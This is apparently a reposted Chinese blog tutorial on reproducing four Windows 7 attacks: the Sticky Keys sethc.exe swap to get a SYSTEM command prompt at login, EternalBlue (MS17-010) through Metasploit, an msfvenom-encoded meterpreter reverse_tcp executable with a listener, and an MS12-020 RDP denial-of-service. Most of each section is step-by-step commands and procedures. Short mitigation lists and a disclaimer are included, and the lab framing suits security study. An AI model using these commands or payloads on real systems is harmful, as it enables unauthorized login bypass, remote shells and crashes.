首页 > 其他分享 >玩转win7四大漏洞的俩天以及解决方案

玩转win7四大漏洞的俩天以及解决方案

时间:2024-09-18 15:24:28浏览次数:1  
标签:exe win7 漏洞 复现 payload sethc 玩转

前言

本教程旨在向安全研究人员和IT专业人士展示如何发现和应对潜在的安全威胁,而非鼓励任何非法或未经授权的活动。在使用本教程中的技术时,请确保遵守所有适用的法律和道德准则。

msfvenom

工具介绍

简单理解,用来生成后门的软件。

payload 查看与使用

msfvenom -p 模板 -e 编码模板 -i 编码次数 -b 避免字符集 LHOST(ifconfig查看) LPORT(监听端口) -f 输出文件类型 > 文件名

注意:某一帮助/配置msfvenom -l [配置项]

例如,我查看这个e编码方式有哪些:

漏洞复现

win7(sp1)的shift连续按5次漏洞

漏洞介绍

当用户连续按下5次Shift键时,正常情况下,系统会启动一个名为“粘滞键”(Sticky Keys)的辅助功能,其对应的程序是sethc.exe,位于C:\Windows\System32\目录下。

然而,在某些未打补丁的Windows 7(SP1)系统上,攻击者可以通过替换或修改sethc.exe文件,使其指向其他程序,如命令提示符(cmd.exe)。
一旦sethc.exe被替换,当用户再次连续按下5次Shift键时,就会启动命令提示符,而不是粘滞键。这样,攻击者就可以在不知道用户密码的情况下,执行各种命令,如修改密码、创建新用户等。

复现过程

1.给win7关机重启,在重启出现徽标途中关闭计算机

2、然后再次开启电脑

3、进⼊修复,选择取消

5、择红框位置,查看问题详细信息:

6、择红框链接,会看到⼀篇⽂档,这个⽂档不重要,重要的是可以访问到
C盘的⽂件,⽽且是最⾼权限。

7、进⼊⽂档之后,选择⽂件–打开–计算机C:\Windows\System32

8、⽂件类型选择所有⽂件,找到sethc⽂件,将sethc重命名,名字随
意。然后找到cmd,复制⼀份,将复制的这⼀份命名为sethc

9、最后重启系统,按5次shfit唤出cmd

附件

常见解决方案

  1. 禁用或修改粘滞键功能
  2. 确保系统补丁更新
  1. 使用强密码和安全软件
  2. 限制对系统文件和目录的访问权限
    ....

永恒之蓝

漏洞介绍

永恒之蓝漏洞爆发于2017年4月14日,由黑客团体Shadow Brokers(影子经纪人)公布。


SMB协议是一个用于在计算机间共享文件、打印机、命名管道等资源的协议.


永恒之蓝漏洞利用了SMB协议中的缓冲区溢出漏洞(编号为MS17-010),通过覆盖其他内存区域,实现远程的命令注入。


恶意代码会扫描开放445端口文件共享端口的Windows机器,无需用户任何操作,只要开机上网,攻击者就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

复现过程

使用nmap对指定网段进行扫描

nmap 192.168.209.0/24

image-20240620201934091

扫到一个目标端口开放的ip,使用Nmap尝试对其进行探测系统信息

nmap -O 192.168.209.129

探测成功,目标主机为Win7系统

仔细观察目标信息,SP1机器,可能存在永恒之蓝漏洞(ms17-010),进入metasploit

找到这个模块ms17_010_eternalblue

use 0 利用ms17_010_eternalblue 永痕之蓝漏洞

配置好必填项

显示meterpreter攻击成功

使用 help 即可查看全部选项,这里尝试调取对方屏幕截图,保存在kali攻击机root目录

常见解决方案

  1. 保持系统更新
  1. 限制远程访问
  2. 使用防火墙和入侵检测系统(IDS/IPS)
  3. 禁用SMBv1。。。

构造payload

漏洞介绍

在网络安全领域,构造payload漏洞是一种常见的攻击手段。攻击者可能会利用各种漏洞利用工具和技术来构建复杂的payload,以绕过安全防护措施并达到攻击目的。这些payload可能以各种形式存在,如恶意二进制文件、脚本、命令等,它们被隐藏在正常的网络流量中,难以被检测和防御。

复现过程

使用msfvenom生成一个payload

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.209.129 lport=4444 -f exe -o /root/virus.exe -e x86/shikata_ga_nai -i8

将该payload上传到自己服务器,目标靶机下载即可,再或者使用scp

msfconsole进入metasploit

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.209.130
set LPORT 4444
exploit/run

在kali中配置一个会话反弹程序

少设置了个payload

当win7点击该软件后

就会执行meterpreter模块

尝试使用shutdown关机,关机成功

常见解决方案

  1. 禁用不必要的服务和功能
  1. 安装可信防病毒软件
  2. 配置防火墙和安全设备
  3. 保持系统和应用程序更新

死亡蓝屏(MS012-020)漏洞

漏洞介绍

MS12-020是一个针对Microsoft Windows远程桌面协议(RDP)的远程代码执行漏洞。RDP是一个多通道的协议,允许用户(客户端或“本地电脑”)连接到提供微软终端机服务的计算机(服务器端或“远程计算机”)。


Windows在处理某些对象时存在错误,攻击者可以通过发送特制的RDP报文来访问未初始化或已删除的对象,从而在目标系统上执行任意代码,进而控制系统。

复现过程

使用工具namp扫描是否开启3389端口

搜索模块 search ms12-020

image-20240620202018593

可以看到上面包含了俩个模块,这里使用模块二 验证靶机是否存在漏洞

image-20240620202031828

显示需要配置的payload,show options

显示The target is vulnerable.(目标是脆弱的)漏洞可执行。

发现目标漏洞之后即可利用该漏洞了,使用刚刚搜索到的模块一 发起攻击

image-20240620202057650

查看靶机状态,漏洞复现成功,如果没有复现成功,还请更换拥有此漏洞的靶场或者没有打补丁的win7靶场进行复现

原文链接: https://mp.weixin.qq.com/s/TajLUx0EJxqm-MUucBbdjg

标签:exe,win7,漏洞,复现,payload,sethc,玩转
From: https://www.cnblogs.com/xiaoyus/p/18418602

相关文章

  • Win7玩游戏Ctrl和空格不能一起按的解决方案
    前几天在Windows7上玩《Minecraft》的时候,发现Ctrl和空格不能一起按,就开始研究,找到一个解决方案。首先打开控制面板,点击更改键盘或其他输入法,就会进入文本服务与输入语言。点击更改键盘,进入高级键设置选项卡,点击下面的快捷键,再点击更改按键顺序。如图,随便把快捷键改成一个你......
  • Spring框架漏洞总结
    目录SpEL注入攻击SpringH2DatabaseConsole未授权访问SpringSecurityOAuth2远程命令执行漏洞(CVE-2016-4977)SpringWebFlow远程代码执行漏洞(CVE-2017-4971)SpringDataRest远程命令执行漏洞(CVE-2017-8046)SpringMessaging远程命令执行漏洞(CVE-2018-1270)SpringDataCom......
  • XXE-XML实体注入漏洞概述
    XXE-"xmlexternalentityinjection"既"xml外部实体注入漏洞"。概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入......
  • 本地文件包含漏洞详解与CTF实战
    1.本地文件包含简介1.1本地文件包含定义本地文件包含是一种Web应用程序漏洞,攻击者通过操控文件路径参数,使得服务器端包含了非预期的文件,从而可能导致敏感信息泄露。常见的攻击方式包括:包含配置文件、日志文件等敏感信息文件,导致信息泄露。包含某些可执行文件或利用文件上......
  • 阅读周·深入浅出的Node.js | Node应用,产品化实践摸索,玩转进程
    背景去年下半年,我在微信书架里加入了许多技术书籍,各种类别的都有,断断续续的读了一部分。没有计划的阅读,收效甚微。新年伊始,我准备尝试一下其他方式,比如阅读周。每月抽出1~2个非连续周,完整阅读一本书籍。这个“玩法”虽然常见且板正,但是有效。已读完书籍:《架构简洁之道》。当前阅读......
  • 5.基础漏洞——文件上传漏洞
    目录一.文件上传漏洞原理二.文件上传漏洞条件:三.上传限制手段分为两大类(1)客户端校验(2)服务端校验四.具体实现1.文件上传漏洞——绕过JS检测2.文件上传漏洞——绕过MIME类型检测3.文件上传漏洞——绕过黑名单检测绕过方式:(1)绕过方式:(2)绕过方式:(3)绕过方式......
  • 商混erp系统多接口sql注入漏洞复现
    0x01漏洞描述:        商混ERP系统是一种针对混凝土行业开发的综合性企业资源规划(ERP)系统。它集成了生产、销售、采购、财务等各个方面的功能,为混凝土生产企业提供了一个全面、高效的数字化管理平台。在Operater_Action.aspx,StockreceiveEdit.aspx接口中存在sql注入,高......
  • 工具分享 | JenkinsExploit-GUI - 一款Jenkins综合漏洞利用工具,一键getshell。
    0x00工具介绍JenkinsExploit-GUI是一款Jenkins综合漏洞利用工具。0x01下载链接JenkinsExploit-GUI下载链接:夸克网盘分享0x02功能介绍CVE-2015-8103/CVE-2016-0788CVE-2016-0792CVE-2017-1000353CVE-2018-1000600CVE-2018-1000861CVE-2018-1999002CVE-20......
  • 【网络安全】漏洞挖掘之CVE-2019-9670+检测工具
    未经许可,不得转载。文章目录漏洞介绍正文工具漏洞介绍CVE-2019-9670是一个与ZimbraCollaborationSuite(ZCS)相关的严重漏洞。ZCS中的AutoDiscover服务存在不正确的XML解析处理,该漏洞可被利用来注入恶意XML代码(例如外部实体注入(XXE)攻击),从而导......
  • 某群管理系统存在SQL注入漏洞
    有些事情不是看到希望才去坚持,而是坚持了才会看到希望。漏洞实战访问url:http://xxx/login.aspx登录界面如下:输入万能密码:用户名:admin'or'1'='1密码输入:123456或任意成功登录:文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。免责声明:由于传播或利用此文所提......